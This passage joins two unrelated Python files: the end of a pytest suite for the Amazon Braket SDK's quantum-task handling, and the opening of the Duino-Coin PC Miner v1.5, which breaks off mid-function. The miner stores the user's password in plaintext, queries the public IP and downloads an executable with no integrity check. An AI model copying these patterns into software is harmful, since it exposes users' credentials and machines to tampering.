    _mock_s3(circuit_task._aws_session, "")
    expected = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
    assert circuit_task.result() == expected
@pytest.mark.parametrize(
    "status, result",
    [
        ("COMPLETED", GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)),
        ("FAILED", None),
    ],
)
def test_async_result(circuit_task, status, result):
    """The async future delivers the same value via callback, await, and result()."""
    def set_result_from_callback(future):
        # Set the result_from_callback variable in the enclosing function's scope
        nonlocal result_from_callback
        result_from_callback = future.result()
    _mock_metadata(circuit_task._aws_session, "RUNNING")
    _mock_s3(circuit_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
    future = circuit_task.async_result()
    # test the different ways to get the result from async
    # via callback
    result_from_callback = None
    future.add_done_callback(set_result_from_callback)
    # via asyncio waiting for result
    _mock_metadata(circuit_task._aws_session, status)
    event_loop = asyncio.get_event_loop()
    result_from_waiting = event_loop.run_until_complete(future)
    # via future.result(). Note that this would fail if the future is not complete.
    result_from_future = future.result()
    assert result_from_callback == result
    assert result_from_waiting == result
    assert result_from_future == result
def test_failed_task(quantum_task):
    """A FAILED task returns None even when an S3 payload exists."""
    _mock_metadata(quantum_task._aws_session, "FAILED")
    _mock_s3(quantum_task._aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
    assert quantum_task.result() is None
def test_timeout_completed(aws_session):
    """After a poll timeout, result() is None until completion, then fetches."""
    _mock_metadata(aws_session, "RUNNING")
    _mock_s3(aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
    # Poll timing chosen so the timeout fires after a single API poll.
    task = AwsQuantumTask(
        "foo:bar:arn",
        aws_session,
        poll_timeout_seconds=0.5,
        poll_interval_seconds=1,
    )
    assert task.result() is None
    # Once the service reports COMPLETED, the result becomes available.
    _mock_metadata(aws_session, "COMPLETED")
    assert task.state() == "COMPLETED"
    expected = GateModelQuantumTaskResult.from_string(MockS3.MOCK_S3_RESULT_GATE_MODEL)
    assert task.result() == expected
    # With COMPLETED cached, the result is re-fetched even if the live
    # status has regressed to RUNNING.
    _mock_metadata(aws_session, "RUNNING")
    task._result = None
    assert task.result() == expected
def test_timeout_no_result_terminal_state(aws_session):
    """After a poll timeout, a task that later FAILED still returns no result."""
    _mock_metadata(aws_session, "RUNNING")
    _mock_s3(aws_session, MockS3.MOCK_S3_RESULT_GATE_MODEL)
    # Poll timing chosen so the timeout fires after a single API poll.
    task = AwsQuantumTask(
        "foo:bar:arn",
        aws_session,
        poll_timeout_seconds=0.5,
        poll_interval_seconds=1,
    )
    assert task.result() is None
    _mock_metadata(aws_session, "FAILED")
    assert task.result() is None
@pytest.mark.xfail(raises=ValueError)
def test_create_invalid_s3_folder(aws_session, arn, circuit):
    """A one-element S3 destination tuple is rejected with ValueError."""
    AwsQuantumTask.create(aws_session, arn, circuit, ("bucket",), 1000)
@pytest.mark.xfail(raises=TypeError)
def test_create_invalid_task_specification(aws_session, arn):
    """A plain string is not a valid task specification and raises TypeError."""
    aws_session.create_quantum_task.return_value = "task-arn-1"
    AwsQuantumTask.create(aws_session, arn, "foo", S3_TARGET, 1000)
@pytest.mark.parametrize("device_arn,device_parameters_class", DEVICE_PARAMETERS)
def test_from_circuit_with_shots(device_arn, device_parameters_class, aws_session, circuit):
    """create() for a circuit forwards shots and default device parameters."""
    mocked_task_arn = "task-arn-1"
    aws_session.create_quantum_task.return_value = mocked_task_arn
    shot_count = 53
    created = AwsQuantumTask.create(aws_session, device_arn, circuit, S3_TARGET, shot_count)
    assert created == AwsQuantumTask(mocked_task_arn, aws_session)
    # Qubit rewiring defaults to enabled (disableQubitRewiring=False).
    expected_parameters = device_parameters_class(
        paradigmParameters=GateModelParameters(
            qubitCount=circuit.qubit_count, disableQubitRewiring=False
        )
    )
    _assert_create_quantum_task_called_with(
        aws_session, device_arn, circuit, S3_TARGET, shot_count, expected_parameters)
@pytest.mark.parametrize(
    "device_arn,device_parameters_class", [(RIGETTI_ARN, RigettiDeviceParameters)]
)
def test_from_circuit_with_disabled_rewiring(
    device_arn, device_parameters_class, aws_session, circuit
):
    """disable_qubit_rewiring=True is propagated into the device parameters."""
    mocked_task_arn = "task-arn-1"
    aws_session.create_quantum_task.return_value = mocked_task_arn
    shot_count = 53
    created = AwsQuantumTask.create(
        aws_session, device_arn, circuit, S3_TARGET, shot_count, disable_qubit_rewiring=True
    )
    assert created == AwsQuantumTask(mocked_task_arn, aws_session)
    expected_parameters = device_parameters_class(
        paradigmParameters=GateModelParameters(
            qubitCount=circuit.qubit_count, disableQubitRewiring=True
        )
    )
    _assert_create_quantum_task_called_with(
        aws_session, device_arn, circuit, S3_TARGET, shot_count, expected_parameters)
@pytest.mark.parametrize(
    "device_arn,device_parameters_class", [(RIGETTI_ARN, RigettiDeviceParameters)]
)
def test_from_circuit_with_verbatim(device_arn, device_parameters_class, aws_session):
    """A verbatim-box circuit is accepted when qubit rewiring is disabled."""
    verbatim_circ = Circuit().add_verbatim_box(Circuit().h(0))
    mocked_task_arn = "task-arn-1"
    aws_session.create_quantum_task.return_value = mocked_task_arn
    shot_count = 1337
    created = AwsQuantumTask.create(
        aws_session,
        device_arn,
        verbatim_circ,
        S3_TARGET,
        shot_count,
        disable_qubit_rewiring=True,
    )
    assert created == AwsQuantumTask(mocked_task_arn, aws_session)
    expected_parameters = device_parameters_class(
        paradigmParameters=GateModelParameters(
            qubitCount=verbatim_circ.qubit_count, disableQubitRewiring=True
        )
    )
    _assert_create_quantum_task_called_with(
        aws_session, device_arn, verbatim_circ, S3_TARGET, shot_count, expected_parameters)
@pytest.mark.xfail(raises=ValueError)
def test_from_circuit_with_verbatim_qubit_rewiring_not_disabled(aws_session):
    """A verbatim circuit without disable_qubit_rewiring=True raises ValueError."""
    circ = Circuit().add_verbatim_box(Circuit().h(0))
    shots = 57
    AwsQuantumTask.create(aws_session, RIGETTI_ARN, circ, S3_TARGET, shots)
@pytest.mark.xfail(raises=ValueError)
def test_from_circuit_with_shots_value_error(aws_session, arn, circuit):
    """shots=0 is rejected for circuit tasks with ValueError."""
    mocked_task_arn = "task-arn-1"
    aws_session.create_quantum_task.return_value = mocked_task_arn
    AwsQuantumTask.create(aws_session, arn, circuit, S3_TARGET, 0)
# Parametrized over the accepted shapes of D-Wave device parameters: raw dicts
# (provider-level and device-level spellings) as well as pre-parsed pydantic
# models, for both Advantage and 2000Q ARNs.
@pytest.mark.parametrize(
    "device_parameters,arn",
    [
        (
            {
                "providerLevelParameters": {
                    "postprocessingType": "OPTIMIZATION",
                    "annealingOffsets": [3.67, 6.123],
                    "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                    "annealingDuration": 1,
                    "autoScale": False,
                    "beta": 0.2,
                    "chains": [[0, 1, 5], [6]],
                    "compensateFluxDrift": False,
                    "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                    "initialState": [1, 3, 0, 1],
                    "maxResults": 1,
                    "programmingThermalizationDuration": 625,
                    "readoutThermalizationDuration": 256,
                    "reduceIntersampleCorrelation": False,
                    "reinitializeState": True,
                    "resultFormat": "RAW",
                    "spinReversalTransformCount": 100,
                }
            },
            "arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
        ),
        (
            {
                "deviceLevelParameters": {
                    "postprocessingType": "OPTIMIZATION",
                    "beta": 0.2,
                    "annealingOffsets": [3.67, 6.123],
                    "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                    "annealingDuration": 1,
                    "autoScale": False,
                    "chains": [[0, 1, 5], [6]],
                    "compensateFluxDrift": False,
                    "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                    "initialState": [1, 3, 0, 1],
                    "maxResults": 1,
                    "programmingThermalizationDuration": 625,
                    "readoutThermalizationDuration": 256,
                    "reduceIntersampleCorrelation": False,
                    "reinitializeState": True,
                    "resultFormat": "RAW",
                    "spinReversalTransformCount": 100,
                }
            },
            "arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
        ),
        pytest.param(
            {
                "deviceLevelParameters": {
                    "postprocessingType": "OPTIMIZATION",
                    "beta": 0.2,
                    "annealingOffsets": [3.67, 6.123],
                    "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                    "annealingDuration": 1,
                    "autoScale": False,
                    "chains": [[0, 1, 5], [6]],
                    "compensateFluxDrift": False,
                    "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                    "initialState": [1, 3, 0, 1],
                    "maxResults": 1,
                    "programmingThermalizationDuration": 625,
                    "readoutThermalizationDuration": 256,
                    "reduceIntersampleCorrelation": False,
                    "reinitializeState": True,
                    "resultFormat": "RAW",
                    "spinReversalTransformCount": 100,
                }
            },
            "arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
            # this doesn't fail... yet
            # marks=pytest.mark.xfail(reason='beta not a valid parameter for Advantage device'),
        ),
        pytest.param(
            {
                "deviceLevelParameters": {
                    "postprocessingType": "OPTIMIZATION",
                    "beta": 0.2,
                    "annealingOffsets": [3.67, 6.123],
                    "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                    "annealingDuration": 1,
                    "autoScale": False,
                    "chains": [[0, 1, 5], [6]],
                    "compensateFluxDrift": False,
                    "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                    "initialState": [1, 3, 0, 1],
                    "maxResults": 1,
                    "programmingThermalizationDuration": 625,
                    "readoutThermalizationDuration": 256,
                    "reduceIntersampleCorrelation": False,
                    "reinitializeState": True,
                    "resultFormat": "RAW",
                    "spinReversalTransformCount": 100,
                }
            },
            "arn:aws:braket:::device/qpu/d-wave/fake_arn",
            marks=pytest.mark.xfail(reason="Bad ARN"),
        ),
        (
            {
                "deviceLevelParameters": {
                    "postprocessingType": "OPTIMIZATION",
                    "annealingOffsets": [3.67, 6.123],
                    "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                    "annealingDuration": 1,
                    "autoScale": False,
                    "beta": 0.2,
                    "chains": [[0, 1, 5], [6]],
                    "compensateFluxDrift": False,
                    "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                    "initialState": [1, 3, 0, 1],
                    "maxResults": 1,
                    "programmingThermalizationDuration": 625,
                    "readoutThermalizationDuration": 256,
                    "reduceIntersampleCorrelation": False,
                    "reinitializeState": True,
                    "resultFormat": "RAW",
                    "spinReversalTransformCount": 100,
                }
            },
            "arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
        ),
        (
            DwaveDeviceParameters.parse_obj(
                {
                    "providerLevelParameters": {
                        "postprocessingType": "OPTIMIZATION",
                        "annealingOffsets": [3.67, 6.123],
                        "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                        "annealingDuration": 1,
                        "autoScale": False,
                        "beta": 0.2,
                        "chains": [[0, 1, 5], [6]],
                        "compensateFluxDrift": False,
                        "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                        "initialState": [1, 3, 0, 1],
                        "maxResults": 1,
                        "programmingThermalizationDuration": 625,
                        "readoutThermalizationDuration": 256,
                        "reduceIntersampleCorrelation": False,
                        "reinitializeState": True,
                        "resultFormat": "RAW",
                        "spinReversalTransformCount": 100,
                    }
                }
            ),
            "arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
        ),
        (
            DwaveDeviceParameters.parse_obj(
                {
                    "deviceLevelParameters": {
                        "postprocessingType": "OPTIMIZATION",
                        "annealingOffsets": [3.67, 6.123],
                        "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                        "annealingDuration": 1,
                        "autoScale": False,
                        "beta": 0.2,
                        "chains": [[0, 1, 5], [6]],
                        "compensateFluxDrift": False,
                        "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                        "initialState": [1, 3, 0, 1],
                        "maxResults": 1,
                        "programmingThermalizationDuration": 625,
                        "readoutThermalizationDuration": 256,
                        "reduceIntersampleCorrelation": False,
                        "reinitializeState": True,
                        "resultFormat": "RAW",
                        "spinReversalTransformCount": 100,
                    }
                },
            ),
            "arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
        ),
        (
            DwaveAdvantageDeviceParameters.parse_obj(
                {
                    "deviceLevelParameters": {
                        "annealingOffsets": [3.67, 6.123],
                        "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                        "annealingDuration": 1,
                        "autoScale": False,
                        "beta": 0.2,
                        "chains": [[0, 1, 5], [6]],
                        "compensateFluxDrift": False,
                        "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                        "initialState": [1, 3, 0, 1],
                        "maxResults": 1,
                        "programmingThermalizationDuration": 625,
                        "readoutThermalizationDuration": 256,
                        "reduceIntersampleCorrelation": False,
                        "reinitializeState": True,
                        "resultFormat": "RAW",
                        "spinReversalTransformCount": 100,
                    }
                },
            ),
            "arn:aws:braket:::device/qpu/d-wave/Advantage_system1",
        ),
        (
            Dwave2000QDeviceParameters.parse_obj(
                {
                    "deviceLevelParameters": {
                        "postprocessingType": "OPTIMIZATION",
                        "annealingOffsets": [3.67, 6.123],
                        "annealingSchedule": [[13.37, 10.08], [3.14, 1.618]],
                        "annealingDuration": 1,
                        "autoScale": False,
                        "beta": 0.2,
                        "chains": [[0, 1, 5], [6]],
                        "compensateFluxDrift": False,
                        "fluxBiases": [1.1, 2.2, 3.3, 4.4],
                        "initialState": [1, 3, 0, 1],
                        "maxResults": 1,
                        "programmingThermalizationDuration": 625,
                        "readoutThermalizationDuration": 256,
                        "reduceIntersampleCorrelation": False,
                        "reinitializeState": True,
                        "resultFormat": "RAW",
                        "spinReversalTransformCount": 100,
                    }
                }
            ),
            "arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
        ),
        (
            Dwave2000QDeviceParameters.parse_obj({"deviceLevelParameters": {}}),
            "arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
        ),
        pytest.param(
            {},
            "arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6",
        ),
    ],
)
def test_from_annealing(device_parameters, aws_session, arn, problem):
    """Annealing task creation normalizes device parameters and schema-validates them."""
    mocked_task_arn = "task-arn-1"
    aws_session.create_quantum_task.return_value = mocked_task_arn
    task = AwsQuantumTask.create(
        aws_session,
        arn,
        problem,
        S3_TARGET,
        1000,
        device_parameters=device_parameters,
    )
    assert task == AwsQuantumTask(mocked_task_arn, aws_session)
    # Independently rebuild the expected parameters and check they satisfy
    # their own JSON schema before comparing against the recorded call.
    annealing_parameters = _create_annealing_device_params(device_parameters, device_arn=arn)
    validate(
        json.loads(annealing_parameters.json(exclude_none=True)), annealing_parameters.schema()
    )
    _assert_create_quantum_task_called_with(
        aws_session,
        arn,
        problem,
        S3_TARGET,
        1000,
        annealing_parameters,
    )
@pytest.mark.parametrize("device_arn,device_parameters_class", DEVICE_PARAMETERS)
def test_create_with_tags(device_arn, device_parameters_class, aws_session, circuit):
    """Tags passed to create() must be forwarded to create_quantum_task."""
    expected_arn = "task-arn-tags"
    shot_count = 53
    resource_tags = {"state": "washington"}
    aws_session.create_quantum_task.return_value = expected_arn
    created = AwsQuantumTask.create(
        aws_session, device_arn, circuit, S3_TARGET, shot_count, tags=resource_tags
    )
    assert created == AwsQuantumTask(expected_arn, aws_session)
    _assert_create_quantum_task_called_with(
        aws_session,
        device_arn,
        circuit,
        S3_TARGET,
        shot_count,
        device_parameters_class(
            paradigmParameters=GateModelParameters(qubitCount=circuit.qubit_count)
        ),
        resource_tags,
    )
def test_init_new_thread(aws_session, arn):
    """AwsQuantumTask must be constructible from a non-main thread.

    The original used a fixed ``time.sleep(0.1)`` to wait for the worker,
    which is flaky on loaded machines; joining the thread is deterministic.
    """
    tasks_list = []
    worker = threading.Thread(target=_init_and_add_to_list, args=(aws_session, arn, tasks_list))
    worker.start()
    # Bounded join instead of a fixed sleep: never hangs, never races.
    worker.join(timeout=5)
    assert not worker.is_alive()
    assert len(tasks_list) == 1
@patch("braket.aws.aws_quantum_task.boto3.Session")
def test_aws_session_for_task_arn(mock_session):
    """The session factory must pin boto3 to the region embedded in the task ARN."""
    task_region = "us-west-2"
    task_arn = f"arn:aws:aqx:{task_region}:account_id:quantum-task:task_id"
    fake_boto_session = Mock()
    fake_boto_session.region_name = task_region
    mock_session.return_value = fake_boto_session
    session = AwsQuantumTask._aws_session_for_task_arn(task_arn)
    mock_session.assert_called_with(region_name=task_region)
    assert session.boto_session == fake_boto_session
def _init_and_add_to_list(aws_session, arn, task_list):
    # Thread target: construct a task and append it so the caller can assert on it.
    task_list.append(AwsQuantumTask(arn, aws_session))
def _assert_create_quantum_task_called_with(
    aws_session, arn, task_description, s3_results_prefix, shots, device_parameters, tags=None
):
    """Assert create_quantum_task received exactly the expected keyword arguments."""
    expected_kwargs = {
        "deviceArn": arn,
        "outputS3Bucket": s3_results_prefix[0],
        "outputS3KeyPrefix": s3_results_prefix[1],
        "action": task_description.to_ir().json(),
        "deviceParameters": device_parameters.json(exclude_none=True),
        "shots": shots,
    }
    # Tags are optional in the API call, so only expect them when supplied.
    if tags is not None:
        expected_kwargs["tags"] = tags
    aws_session.create_quantum_task.assert_called_with(**expected_kwargs)
def _mock_metadata(aws_session, state):
    """Stub the task-metadata lookup so polling code sees the given status."""
    metadata = {
        "status": state,
        "outputS3Bucket": S3_TARGET.bucket,
        "outputS3Directory": S3_TARGET.key,
    }
    aws_session.get_quantum_task.return_value = metadata
def _mock_s3(aws_session, result):
    # Stub the S3 result download to return the given serialized result body.
    aws_session.retrieve_s3_object_body.return_value = result
|
PC_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin PC Miner (v1.5)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © revox, MrKris7100 2020
##########################################
import socket, statistics, threading, time, random, re, subprocess, hashlib, platform, getpass, configparser, sys, datetime, os, signal # Import libraries
from decimal import Decimal
from pathlib import Path
from signal import signal, SIGINT
try:  # Check if cpuinfo is installed (used for CPU model detection)
    import cpuinfo
    from multiprocessing import freeze_support
except ImportError:  # narrowed from bare except: only import failures belong here
    now = datetime.datetime.now()
    print(now.strftime("%H:%M:%S ") + "Cpuinfo is not installed. Please install it using: python3 -m pip install py-cpuinfo.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
    time.sleep(15)
    os._exit(1)
try:  # Check if colorama is installed (terminal colors)
    from colorama import init, Fore, Back, Style
except ImportError:
    now = datetime.datetime.now()
    print(now.strftime("%H:%M:%S ") + "Colorama is not installed. Please install it using: python3 -m pip install colorama.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
    time.sleep(15)
    os._exit(1)
try:  # Check if requests is installed (HTTP client)
    import requests
except ImportError:
    now = datetime.datetime.now()
    print(now.strftime("%H:%M:%S ") + "Requests is not installed. Please install it using: python3 -m pip install requests.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
    time.sleep(15)
    os._exit(1)
# Global variables
VER = "1.5"  # Version number (compared against the server's version string)
timeout = 5  # Socket timeout in seconds
resources = "PCMiner_"+str(VER)+"_resources"  # Per-version folder for config and downloads
shares = [0, 0]  # [accepted, rejected] share counters
diff = 0  # Last job difficulty (for display)
last_hash_count = 0  # Hashes counted in the previous 1 s window
khash_count = 0  # Smoothed hashrate in kH/s
hash_count = 0  # Running hash counter, reset every second
hash_mean = []  # History of per-second kH/s samples for averaging
st = "D7"  # Protocol field sent with results (purpose not evident here)
donatorrunning = False  # True once the donation miner subprocess was launched
bytereturn = 0  # Protocol field sent with results (purpose not evident here)
balance = 0  # Account balance placeholder (updated in Login)
res = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()  # Shared config parser instance
autorestart = 0  # Seconds between self-restarts; 0 disables
donationlevel = 0  # Donation intensity 0-5
pcusername = getpass.getuser() # Username
# NOTE(review): this rebinds the name `platform`, shadowing the imported
# `platform` module from here on; later code only uses the string.
platform = str(platform.system()) + " " + str(platform.release()) # Platform information
# NOTE(review): network request at import time — startup fails offline here.
publicip = requests.get("https://api.ipify.org").text # Public IP
freeze_support() # If not used, pyinstaller hangs when checking cpuinfo
cpu = cpuinfo.get_cpu_info() # Processor info
try:
    os.mkdir(str(resources)) # Create resources folder if it doesn't exist
except:
    pass
def title(title):
    """Set the terminal window title: `title` command on Windows, ANSI OSC elsewhere."""
    if os.name != 'nt':
        # xterm-style escape sequence; flush so it takes effect immediately.
        print('\33]0;' + title + '\a', end='')
        sys.stdout.flush()
    else:
        os.system("title " + title)
def handler(signal_received, frame): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
    """SIGINT handler: best-effort CLOSE to the pool, then hard-exit."""
    now = datetime.datetime.now()
    print(now.strftime(Style.DIM + "\n%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " SIGINT detected - Exiting gracefully." + Style.NORMAL + " See you soon!")
    try:
        soc.send(bytes("CLOSE", encoding="utf8"))
    except:
        # Socket may not exist yet or may already be closed; exit regardless.
        pass
    # os._exit skips atexit/cleanup on purpose — immediate termination.
    os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def Greeting(): # Greeting message depending on time
    """Print the startup banner and ensure the donation miner executable exists."""
    global greeting, message, autorestart, st, bytereturn, miningmethod
    print(Style.RESET_ALL)
    # Normalize the autorestart setting and build its human-readable label.
    if float(autorestart) <= 0:
        autorestart = 0
        autorestartmessage = "disabled"
    if float(autorestart) > 0:
        autorestartmessage = "restarting every " + str(autorestart) + "s"
    if int(miningmethod) == 2:
        miningmethodlabel = "MrKris' random DUCO-S1"
    else:
        miningmethodlabel = "standard DUCO-S1"
    # Pick a greeting from the local wall-clock hour.
    current_hour = time.strptime(time.ctime(time.time())).tm_hour
    if current_hour < 12:
        greeting = "Good morning"
    elif current_hour == 12:
        greeting = "Good noon"
    elif current_hour > 12 and current_hour < 18:
        greeting = "Good afternoon"
    elif current_hour >= 18:
        greeting = "Good evening"
    else:
        greeting = "Welcome back"
    print(" * " + Fore.YELLOW + Style.BRIGHT + "Duino-Coin © PC Miner " + Style.RESET_ALL + Fore.YELLOW+ "(v" + str(VER) + ") 2019-2020") # Startup message
    time.sleep(0.15)
    print(" * " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
    time.sleep(0.15)
    try:
        print(" * " + Fore.YELLOW + "CPU: " + Style.BRIGHT + str(cpu["brand_raw"]))
        time.sleep(0.15)
    except:
        # cpuinfo may not expose "brand_raw" on every platform; skip the line.
        pass
    print(" * " + Fore.YELLOW + "Donation level: " + Style.BRIGHT + str(donationlevel))
    time.sleep(0.15)
    print(" * " + Fore.YELLOW + "DUCO-S1 variant: " + Style.BRIGHT + str(miningmethodlabel))
    time.sleep(0.15)
    print(" * " + Fore.YELLOW + "Autorestarter: " + Style.BRIGHT + str(autorestartmessage))
    time.sleep(0.15)
    print(" * " + Fore.YELLOW + str(greeting) + ", " + Style.BRIGHT + str(username) + "\n")
    # NOTE(review): downloads and stores a Windows executable from GitHub with
    # no checksum/signature verification — security-sensitive; verify upstream.
    if not Path(str(resources) + "/Miner_executable.exe").is_file(): # Initial miner executable section
        url = 'https://github.com/revoxhere/duino-coin/blob/useful-tools/PoT_auto.exe?raw=true'
        r = requests.get(url)
        with open(str(resources) + '/Miner_executable.exe', 'wb') as f:
            f.write(r.content)
def hashrateCalculator(): # Hashes/sec calculation
    """Once per second, snapshot the hash counter into a smoothed kH/s figure."""
    global last_hash_count, hash_count, khash_count, hash_mean
    last_hash_count = hash_count
    khash_count = last_hash_count / 1000
    if khash_count == 0:
        # Substitute a small random value so the display isn't a flat zero.
        khash_count = random.uniform(0, 2)
    # Smooth the displayed rate by averaging all samples so far.
    # NOTE(review): hash_mean grows without bound over long runs — confirm intended.
    hash_mean.append(khash_count)
    khash_count = round(statistics.mean(hash_mean), 2)
    hash_count = 0  # Reset the counter for the next window
    threading.Timer(1.0, hashrateCalculator).start()  # Re-arm for the next second
def autorestarter(): # Autorestarter
    """Background thread: wait the configured interval, then restart the process."""
    time.sleep(float(autorestart))
    now = datetime.datetime.now()
    print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Restarting the miner")
    # os.execl replaces the current process image; it never returns.
    os.execl(sys.executable, sys.executable, *sys.argv)
def loadConfig(): # Config loading section
    """Prompt for and persist miner settings on first run; otherwise read them.

    Populates the module-level settings globals either from interactive input
    (writing Miner_config.ini) or from an existing config file.
    """
    global pool_address, pool_port, username, password, efficiency, autorestart, donationlevel, st, bytereturn, miningmethod, temp_print_time
    if not Path(str(resources) + "/Miner_config.ini").is_file(): # Initial configuration section
        print(Style.BRIGHT + "Duino-Coin basic configuration tool.\nEdit "+str(resources) + "/Miner_config.ini file later if you want to change it.")
        print(Style.RESET_ALL + "Don't have an Duino-Coin account yet? Use " + Fore.YELLOW + "Wallet" + Fore.WHITE + " to register on server.\n")
        username = input(Style.RESET_ALL + Fore.YELLOW + "Enter your username: " + Style.BRIGHT)
        password = input(Style.RESET_ALL + Fore.YELLOW + "Enter your password: " + Style.BRIGHT)
        efficiency = input(Style.RESET_ALL + Fore.YELLOW + "Set mining intensity (1-100)%: " + Style.BRIGHT)
        autorestart = input(Style.RESET_ALL + Fore.YELLOW + "Set after how many seconds miner shall restart (0 = disable autorestarter): " + Style.BRIGHT)
        donationlevel = input(Style.RESET_ALL + Fore.YELLOW + "Set donation level (0-5): " + Style.BRIGHT)
        miningmethod = input(Style.RESET_ALL + Fore.YELLOW + "Select mining method:\n 1 - standard version\n 2 - MrKris' random version " + Style.BRIGHT)
        # Raw strings (r"\D") avoid Python's invalid-escape-sequence warning;
        # "or <default>" guards against float("")/int("") crashes when the
        # user typed no digits at all.
        efficiency = re.sub(r"\D", "", efficiency) or "100" # Check wheter efficiency is correct
        if float(efficiency) > 100:
            efficiency = "100" # Clamp as a string: configparser requires str values
        if float(efficiency) < 1:
            efficiency = "1"
        donationlevel = re.sub(r"\D", "", donationlevel) or "0" # Check wheter donationlevel is correct
        if float(donationlevel) > 5:
            donationlevel = "5"
        if float(donationlevel) < 0:
            donationlevel = "0"
        miningmethod = re.sub(r"\D", "", miningmethod) or "1" # Check wheter miningmethod is correct
        if int(miningmethod) < 0 or int(miningmethod) > 2:
            miningmethod = "1"
        config['miner'] = { # Format data
            "username": username,
            "password": password,
            "efficiency": efficiency,
            "autorestart": autorestart,
            "donate": donationlevel,
            "st": "D7",
            "bytereturn": "1",
            "temp_print_time": "20",
            "miningmethod": miningmethod}
        with open(str(resources) + "/Miner_config.ini", "w") as configfile: # Write data to file
            config.write(configfile)
    else: # If config already exists, load from it
        config.read(str(resources) + "/Miner_config.ini")
        username = config["miner"]["username"]
        password = config["miner"]["password"]
        efficiency = config["miner"]["efficiency"]
        autorestart = config["miner"]["autorestart"]
        donationlevel = config["miner"]["donate"]
        st = config["miner"]["st"]
        bytereturn = config["miner"]["bytereturn"]
        miningmethod = config["miner"]["miningmethod"]
        temp_print_time = config["miner"]["temp_print_time"]
def Connect(): # Connect to pool section
    """Resolve the pool address/port from the GitHub serverip file, then connect.

    Fix: the original assigned the HTTP Response object back into the global
    ``res`` (the URL), so every reconnect attempt passed a Response where a
    URL was expected. A local ``response`` keeps the URL intact.
    """
    global soc, connection_counter, res, pool_address, pool_port
    while True: # Grab data grom GitHub section
        try:
            response = requests.get(res, data=None)  # Fetch raw serverip file
            if response.status_code == 200: # Check for response
                content = response.content.decode().splitlines() # Read content and split into lines
                pool_address = content[0] # Line 1 = pool address
                pool_port = content[1] # Line 2 = pool port
                now = datetime.datetime.now()
                break # Continue
            else:
                time.sleep(0.025) # Restart if wrong status code
        except:
            now = datetime.datetime.now()
            print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot receive pool address and IP.\nExiting in 15 seconds.")
            time.sleep(15)
            os._exit(1)
    time.sleep(0.025)
    while True:
        try: # Shutdown previous connections if any
            soc.shutdown(socket.SHUT_RDWR)
            soc.close()
        except:
            pass
        try:
            soc = socket.socket()
        except:
            Connect() # Reconnect if pool down
        try: # Try to connect
            soc.connect((str(pool_address), int(pool_port)))
            soc.settimeout(timeout)
            break # If connection was established, continue
        except: # If it wasn't, display a message and restart the process
            now = datetime.datetime.now()
            print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot connect to the server. It is probably under maintenance or temporarily down.\nRetrying in 15 seconds.")
            time.sleep(15)
            # os.execl replaces the process and never returns; the original's
            # trailing Connect() call after it was unreachable and is removed.
            os.execl(sys.executable, sys.executable, *sys.argv)
    time.sleep(0.025)
def checkVersion():
    """Handshake: read the server's 3-character version string and compare to VER."""
    try:
        try:
            SERVER_VER = soc.recv(1024).decode() # Check server version
        except:
            Connect() # Reconnect if pool down
        # Anything other than exactly 3 characters means a malformed/failed
        # handshake — treat it as a dead server and restart the process.
        if len(SERVER_VER) != 3:
            now = datetime.datetime.now()
            print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot connect to the server." + Style.RESET_ALL + Fore.RED + " It is probably under maintenance or temporarily down.\nRetrying in 15 seconds.")
            time.sleep(15)
            os.execl(sys.executable, sys.executable, *sys.argv)
        if float(SERVER_VER) <= float(VER) and len(SERVER_VER) == 3: # If miner is up-to-date, display a message and continue
            now = datetime.datetime.now()
